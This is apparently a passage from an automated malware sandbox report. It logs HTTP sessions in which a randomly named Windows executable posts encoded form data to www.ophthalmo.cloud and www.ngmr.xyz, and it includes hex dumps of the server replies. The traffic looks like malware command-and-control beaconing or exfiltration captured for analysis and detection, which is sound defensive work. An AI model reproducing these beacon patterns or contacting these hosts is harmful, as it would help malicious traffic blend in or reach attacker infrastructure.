                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Origin: http://www.ophthalmo.cloud
                                              Connection: close
                                              Content-Length: 231
                                              Cache-Control: max-age=0
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.ophthalmo.cloud/mgg3/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Data Raw: 55 4c 3d 74 47 71 63 4a 51 75 33 69 4f 6e 6f 72 74 2f 46 45 43 6a 66 2b 70 67 4e 4f 33 49 52 32 55 68 58 35 30 69 4a 55 6a 76 6b 75 64 51 6f 7a 58 69 4c 6e 61 35 41 42 74 78 52 52 2f 6f 56 4b 38 48 70 74 4c 44 44 4d 4d 78 73 58 74 7a 52 71 77 73 7a 4c 75 78 6b 7a 6d 35 6a 77 66 4b 44 58 6d 6b 71 2f 36 66 4a 32 37 6a 57 2f 50 44 58 30 56 73 46 59 54 4a 47 58 67 41 50 6c 33 6a 31 70 61 39 35 79 55 55 31 41 51 73 43 53 6e 69 35 79 53 50 44 53 36 38 6a 34 39 72 67 78 33 75 2b 61 41 42 70 46 73 30 6f 78 70 74 38 4e 4a 32 48 32 6f 69 47 69 4c 6f 43 44 6c 47 45 61 4e 6f 4d 31 52 50 2f 52 6b 4e 54 30 30 41 35 36 7a 32 71 59 35 6d 73 31 5a 33 31 36 59 54 7a 33 4a 6c 2b 39 4a 5a 76 6a 67 3d 3d
                                              Data Ascii: UL=tGqcJQu3iOnort/FECjf+pgNO3IR2UhX50iJUjvkudQozXiLna5ABtxRR/oVK8HptLDDMMxsXtzRqwszLuxkzm5jwfKDXmkq/6fJ27jW/PDX0VsFYTJGXgAPl3j1pa95yUU1AQsCSni5ySPDS68j49rgx3u+aABpFs0oxpt8NJ2H2oiGiLoCDlGEaNoM1RP/RkNT00A56z2qY5ms1Z316YTz3Jl+9JZvjg==
                                              Dec 5, 2024 18:36:43.922816038 CET779INHTTP/1.1 404 Not Found
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Date: Thu, 05 Dec 2024 17:36:43 GMT
                                              Server: Apache
                                              X-Frame-Options: deny
                                              Content-Encoding: gzip
                                              Data Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 [TRUNCATED]
                                              Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.649936217.160.0.207802544C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 5, 2024 18:36:45.241411924 CET1823OUTPOST /mgg3/ HTTP/1.1
                                              Host: www.ophthalmo.cloud
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Origin: http://www.ophthalmo.cloud
                                              Connection: close
                                              Content-Length: 1243
                                              Cache-Control: max-age=0
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.ophthalmo.cloud/mgg3/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Data Raw: 55 4c 3d 74 47 71 63 4a 51 75 33 69 4f 6e 6f 72 74 2f 46 45 43 6a 66 2b 70 67 4e 4f 33 49 52 32 55 68 58 35 30 69 4a 55 6a 76 6b 75 64 49 6f 77 68 65 4c 31 35 42 41 41 74 78 52 59 66 6f 57 4b 38 47 37 74 4c 62 66 4d 4e 4d 4f 58 75 48 52 6c 32 34 7a 4f 63 4a 6b 38 6d 35 6a 79 66 4b 43 50 47 6c 69 2f 36 50 4e 32 37 7a 57 2f 50 44 58 30 55 63 46 52 68 68 47 61 41 41 41 69 33 6a 79 69 36 39 52 79 51 34 44 41 51 70 31 56 58 43 35 38 57 6a 44 55 59 6b 6a 6c 4e 72 69 79 33 75 6d 61 41 4d 33 46 73 6f 4f 78 70 78 57 4e 4f 2b 48 37 63 62 61 77 4a 63 2b 5a 31 57 48 46 4b 55 54 78 42 47 50 66 79 64 77 6c 55 59 4a 2f 42 75 66 57 2b 2f 7a 78 4c 43 51 34 4a 7a 6a 7a 4f 4d 4d 6f 39 77 46 32 62 7a 37 35 6b 6c 39 56 51 61 68 4d 39 46 71 72 65 4c 74 6e 34 57 71 7a 68 72 55 4b 33 31 63 58 67 79 44 78 38 30 73 4c 6b 4f 67 71 46 2f 48 4c 70 4c 54 59 57 4d 71 6e 6b 4a 66 46 77 47 79 75 59 53 50 6f 38 37 6d 53 47 66 79 66 6c 6e 7a 52 74 30 6c 56 62 7a 63 43 53 65 78 67 2f 47 4b 6e 75 4d 76 7a 39 75 55 46 51 72 4b 56 55 62 [TRUNCATED]
                                              Data Ascii: UL=tGqcJQu3iOnort/FECjf+pgNO3IR2UhX50iJUjvkudIowheL15BAAtxRYfoWK8G7tLbfMNMOXuHRl24zOcJk8m5jyfKCPGli/6PN27zW/PDX0UcFRhhGaAAAi3jyi69RyQ4DAQp1VXC58WjDUYkjlNriy3umaAM3FsoOxpxWNO+H7cbawJc+Z1WHFKUTxBGPfydwlUYJ/BufW+/zxLCQ4JzjzOMMo9wF2bz75kl9VQahM9FqreLtn4WqzhrUK31cXgyDx80sLkOgqF/HLpLTYWMqnkJfFwGyuYSPo87mSGfyflnzRt0lVbzcCSexg/GKnuMvz9uUFQrKVUbGtYaogNifREk0JRSp9WiF1ktwQKiCbcUGC20EV9CjJ6HkwcooGgHNyz0T0zGOJ+VMVdrLD7SGhGPvp0oELw0sx5y0HFmtAT72rEY9IhdQI3Pk7o4xxs4WwAzi1b5xbG9abpqOe4xjOoURllCeLr7ZF/0xjAq9n+V0rx0S9AnZ9Z6TAWSQK8MyLwbjX4MTyICo7x/W0IEynmSoQJ61jqa0dXzed23pLY2qblkQEFWUXyF/wxaFqYAbr3oDooq7bh8ULL2BtKpdJIR7MKfdA3AKHfIl8TS2LVecRYSLgQ88duqHuzeNQmhN741XOj5LaSYkyELNOdoPvY/MwIRITsckuYD5xyCllctRridMouhNTbxQ5UgvJ6eSejphbISNuHJXKBk6+rVHcVuS9QaqteV820Wo5lRqrL9Z3BU5hnUr+aQ2onNfAQ+3tw4baVinvIAJ31WwW6q2mUlOWfnHBAlTsGYmd3BZNkoRpl9ojn1E72M9AipZ/6JXeARJyKFu7GnA0SVyAvx287CJiYIjK5nd/44kGN2R9QN6GSKyeu4Pe25s8HxKUs9cG9LUIKy99WfGzazGTus8m2TgmFgeqYoScXpSZPOK0Hza4kEAaFO6LhPUT58uoQH6tEQgRAf1ct6ZNfhedb1R5Ahz7VLkWznyRP5qFwCNNgic2 [TRUNCATED]
                                              Dec 5, 2024 18:36:46.631375074 CET779INHTTP/1.1 404 Not Found
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Date: Thu, 05 Dec 2024 17:36:46 GMT
                                              Server: Apache
                                              X-Frame-Options: deny
                                              Content-Encoding: gzip
                                              Data Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 [TRUNCATED]
                                              Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.649942217.160.0.207802544C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 5, 2024 18:36:47.892755032 CET521OUTGET /mgg3/?UL=gEC8KgLUidSdu/LaJDm0wdgPKykh22cq0AnLcRTEvs4H+h+Cn5seN/p6ZNIXUcjC7qbBK+lucO22lGJyLeY25FhT4OGOXAIr1rjNwK/1/eOG81EIQGExdwYvr17BwuFAzREpBF4=&tX=7fn4Kf88PV HTTP/1.1
                                              Host: www.ophthalmo.cloud
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Dec 5, 2024 18:36:49.221368074 CET1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html
                                              Content-Length: 1271
                                              Connection: close
                                              Date: Thu, 05 Dec 2024 17:36:49 GMT
                                              Server: Apache
                                              X-Frame-Options: deny
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> </div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + [TRUNCATED]
                                              Dec 5, 2024 18:36:49.221386909 CET203INData Raw: 20 20 20 20 20 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 20 2b 20 27 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 49 4f 4e 4f 53 50 61 72 6b 69 6e 67 44 45 27 0a
                                              Data Ascii: + window.location.host + '/' + 'IONOSParkingDE' + '/park.js">' + '<\/script>' ); </script> </body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.64995854.67.87.110802544C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 5, 2024 18:36:54.999003887 CET765OUTPOST /qj8y/ HTTP/1.1
                                              Host: www.ngmr.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Origin: http://www.ngmr.xyz
                                              Connection: close
                                              Content-Length: 207
                                              Cache-Control: max-age=0
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.ngmr.xyz/qj8y/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Data Raw: 55 4c 3d 59 4a 45 52 33 58 44 44 64 71 51 35 43 51 2b 2b 68 4b 41 32 6b 6a 58 68 51 61 76 64 6a 49 6d 50 53 4f 2f 32 6f 4e 58 33 42 42 53 4b 77 74 72 6e 75 78 76 44 51 78 2b 37 4c 57 4a 6d 42 7a 34 30 57 2b 7a 6a 42 58 65 58 37 2b 37 61 31 76 64 52 6b 57 68 45 67 56 31 67 39 56 31 6c 4f 59 55 34 31 4c 34 6b 58 33 69 72 65 73 6e 73 2f 34 61 39 37 6a 42 5a 34 58 6e 4d 50 7a 65 70 79 70 6c 79 36 71 34 4f 33 43 6d 41 64 37 50 4e 6f 75 4b 45 46 4a 43 61 30 67 63 6a 65 32 56 4f 4f 61 69 56 6b 48 4b 45 31 2b 37 2f 30 67 58 49 54 47 77 50 58 4f 59 4b 75 4a 39 42 42 62 75 44 44 76 32 38 70 58 50 56 52 5a 73 47 31 45 41 56
                                              Data Ascii: UL=YJER3XDDdqQ5CQ++hKA2kjXhQavdjImPSO/2oNX3BBSKwtrnuxvDQx+7LWJmBz40W+zjBXeX7+7a1vdRkWhEgV1g9V1lOYU41L4kX3iresns/4a97jBZ4XnMPzepyply6q4O3CmAd7PNouKEFJCa0gcje2VOOaiVkHKE1+7/0gXITGwPXOYKuJ9BBbuDDv28pXPVRZsG1EAV
                                              Dec 5, 2024 18:36:56.224602938 CET550INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 282
                                              Accept-Ranges: bytes
                                              Date: Thu, 05 Dec 2024 18:00:17 GMT
                                              X-Varnish: 1252451588
                                              Age: 0
                                              Via: 1.1 varnish
                                              Connection: close
                                              X-Varnish-Cache: MISS
                                              Server: C2M Server v1.02
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 6a 38 79 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qj8y/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.64996654.67.87.110802544C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 5, 2024 18:36:57.663726091 CET789OUTPOST /qj8y/ HTTP/1.1
                                              Host: www.ngmr.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Origin: http://www.ngmr.xyz
                                              Connection: close
                                              Content-Length: 231
                                              Cache-Control: max-age=0
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.ngmr.xyz/qj8y/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Data Raw: 55 4c 3d 59 4a 45 52 33 58 44 44 64 71 51 35 41 77 4f 2b 75 4e 63 32 6f 54 58 6d 4a 71 76 64 78 49 6d 4c 53 4f 7a 32 6f 50 37 42 42 79 32 4b 78 4a 6a 6e 76 31 37 44 64 52 2b 37 41 32 4a 6a 63 44 34 2f 57 2b 32 57 42 53 2b 58 37 2b 48 61 31 74 56 52 6e 6c 35 4c 67 46 31 75 78 31 31 6e 54 6f 55 34 31 4c 34 6b 58 7a 4f 52 65 6f 7a 73 2f 4c 53 39 37 43 42 65 77 33 6e 4e 49 7a 65 70 32 70 6c 2b 36 71 34 38 33 47 47 6d 64 35 33 4e 6f 75 61 45 4c 36 61 5a 36 67 63 6c 44 6d 56 52 4a 37 62 4e 74 6e 53 43 70 39 6d 5a 6d 52 54 7a 53 77 78 56 4c 39 59 70 38 5a 64 44 42 5a 32 78 44 50 32 57 72 58 33 56 44 4f 67 68 36 77 6c 32 59 47 4e 4f 76 54 48 68 4a 78 66 73 63 48 53 55 6d 32 6c 41 4e 51 3d 3d
                                              Data Ascii: UL=YJER3XDDdqQ5AwO+uNc2oTXmJqvdxImLSOz2oP7BBy2KxJjnv17DdR+7A2JjcD4/W+2WBS+X7+Ha1tVRnl5LgF1ux11nToU41L4kXzOReozs/LS97CBew3nNIzep2pl+6q483GGmd53NouaEL6aZ6gclDmVRJ7bNtnSCp9mZmRTzSwxVL9Yp8ZdDBZ2xDP2WrX3VDOgh6wl2YGNOvTHhJxfscHSUm2lANQ==
                                              Dec 5, 2024 18:36:58.904553890 CET550INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 282
                                              Accept-Ranges: bytes
                                              Date: Thu, 05 Dec 2024 18:00:20 GMT
                                              X-Varnish: 1252451590
                                              Age: 0
                                              Via: 1.1 varnish
                                              Connection: close
                                              X-Varnish-Cache: MISS
                                              Server: C2M Server v1.02
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 6a 38 79 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qj8y/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.2.64997654.67.87.110802544C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 5, 2024 18:37:00.392107964 CET1802OUTPOST /qj8y/ HTTP/1.1
                                              Host: www.ngmr.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Origin: http://www.ngmr.xyz
                                              Connection: close
                                              Content-Length: 1243
                                              Cache-Control: max-age=0
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.ngmr.xyz/qj8y/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Data Raw: 55 4c 3d 59 4a 45 52 33 58 44 44 64 71 51 35 41 77 4f 2b 75 4e 63 32 6f 54 58 6d 4a 71 76 64 78 49 6d 4c 53 4f 7a 32 6f 50 37 42 42 79 2b 4b 77 37 37 6e 74 55 37 44 63 52 2b 37 4a 57 4a 69 63 44 34 2b 57 34 66 65 42 53 36 74 37 37 4c 61 30 4f 4e 52 69 55 35 4c 76 46 31 75 75 46 31 6d 4f 59 55 74 31 4c 49 6f 58 7a 2b 52 65 6f 7a 73 2f 4b 43 39 35 54 42 65 32 33 6e 4d 50 7a 65 74 79 70 6c 53 36 71 67 57 33 47 43 70 64 4e 44 4e 6f 50 71 45 47 6f 43 5a 79 67 63 6e 41 6d 55 45 4a 36 6e 73 74 6e 2f 39 70 2b 37 79 6d 54 50 7a 65 55 59 4b 5a 2b 77 6a 2b 37 64 2f 64 4f 65 6c 46 70 2f 39 68 57 4c 49 46 39 73 43 78 43 70 43 63 54 35 34 75 68 2b 6b 4b 42 6e 6b 44 79 62 4c 67 48 30 69 59 6d 68 6b 2b 54 70 4a 38 43 67 31 34 65 31 56 54 49 2f 4f 46 36 73 48 52 73 47 4a 73 6c 4b 44 52 37 36 6f 67 42 4d 49 65 30 67 4c 4a 61 46 4a 6b 42 52 57 4a 49 70 6a 4f 72 4c 76 51 61 6d 7a 31 34 45 4b 34 65 6c 2f 74 47 71 4b 51 31 44 42 38 4c 2f 50 6b 69 38 51 5a 41 48 71 55 54 43 56 76 52 4d 53 37 6c 4d 76 6b 30 59 41 61 55 67 [TRUNCATED]
                                              Data Ascii: UL=YJER3XDDdqQ5AwO+uNc2oTXmJqvdxImLSOz2oP7BBy+Kw77ntU7DcR+7JWJicD4+W4feBS6t77La0ONRiU5LvF1uuF1mOYUt1LIoXz+Reozs/KC95TBe23nMPzetyplS6qgW3GCpdNDNoPqEGoCZygcnAmUEJ6nstn/9p+7ymTPzeUYKZ+wj+7d/dOelFp/9hWLIF9sCxCpCcT54uh+kKBnkDybLgH0iYmhk+TpJ8Cg14e1VTI/OF6sHRsGJslKDR76ogBMIe0gLJaFJkBRWJIpjOrLvQamz14EK4el/tGqKQ1DB8L/Pki8QZAHqUTCVvRMS7lMvk0YAaUgMkaIE2jkiyLqhEaxa3NTlj5S2AybA3JlqX8ZNAqm1mvTa461xxvFyrhILsCTAwdTnUVKMyDQZPwq76mouDcU2m1I1VJjDa5KV1275hmgEcHvCJPrmo/cBtF1z4PAYapNoSmbwlgqApEraTHx+ZQkSiG19bEx3StFPH7UrQdYY2zOMj5dXwm/j48LGVuP5vuRZU0HRk9eQV7ThVobuJfzyiz4CYRaOxlVdmzR8Ewuwfb3I6ifN2yPzC7PtLd3eA6d0pwCdh6iRxn+kNQ2OecSXJs2FCNCo54sRGx31bOplxq1So9YbTj6NqvnbDzGi05nFd+CAStf/H38/p6bzyIJK9LLZsKzlO3smwqj56WL0sRj1R4ocLak/HQHSj44hi2qo1FhFwZJqHWZE4MdXWC/bfo7gAs5Q2UbHR4sZDoZ6xneYd0CzP2jIqGoxJxWUSuVKeZ5Pc1K1eKktdoTTWN07SpHesKyaLkbypRmTzWbzcGzgTP+USIbUkomQRh1eapNjeclHT/ugLGeGq6n5Ycbj/ikOi6HxG147qJ7JFhiyd0e0xP2C06Sb/2DV5uW8s0b832beRponZ0P4OHBFzEywzzM5+rqfg1NPD2OlboXxpPVAAS6Hg4OFkrJZiY3Z96QYTbiXVsJTHLYv3j81B2sOW0nZo8e9bqyho [TRUNCATED]
                                              Dec 5, 2024 18:37:01.608062983 CET550INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 282
                                              Accept-Ranges: bytes
                                              Date: Thu, 05 Dec 2024 18:00:23 GMT
